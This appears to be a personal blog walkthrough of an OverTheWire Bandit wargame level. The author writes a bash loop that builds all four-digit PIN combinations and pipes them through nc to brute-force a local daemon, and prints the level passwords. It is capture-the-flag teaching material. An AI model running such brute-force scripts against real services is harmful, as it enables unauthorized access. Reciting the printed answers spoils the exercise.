Posted by 
Level Goal
Level Goal
A daemon is listening on port 30002 and will give you the password for bandit25 if given the password for bandit24 and a secret numeric 4-digit pincode. There is no way to retrieve the pincode except by going through all of the 10000 combinations, called brute-forcing.
Walkthrough
So we need to write an script again to bruteforce this. I only now a bit of bash, but this should be doable. Lets see which command we need to execute and how this works. Lets try the format: nc localhost poort password pin
It asks for the pin after the connection. Okaay. Lets try to echo the password and pin and pipe this into nc and see what it does. This works we get a please enter the correct pincode back. We can use this in our script, but we need a list of all the possible combinations.
So I googled on how to make a for loop to generate the 4 digital pincode and came up with this:
#!/bin/bash
password24=UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ
for i in {0000..9999}
do
echo $password24 $i >> passlist.txt
done
This generated the passlist.txt with the password and 0000 for example:
UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ 0000 UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ 0001 UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ 0002 UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ 0003 UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ 0004 UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ 0005 UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ 0006 UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ 0007 UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ 0008
So now the only thing I need to do is cat this file into nc and let it run? Lets try it.
cat passlist.txt | nc localhost 30002
This goes fast and it runs!, we got the password but no idea what pincode was entered. But we got the password: uNG9O58gUE7snukf3bvZ0rxhtnjzSGzG
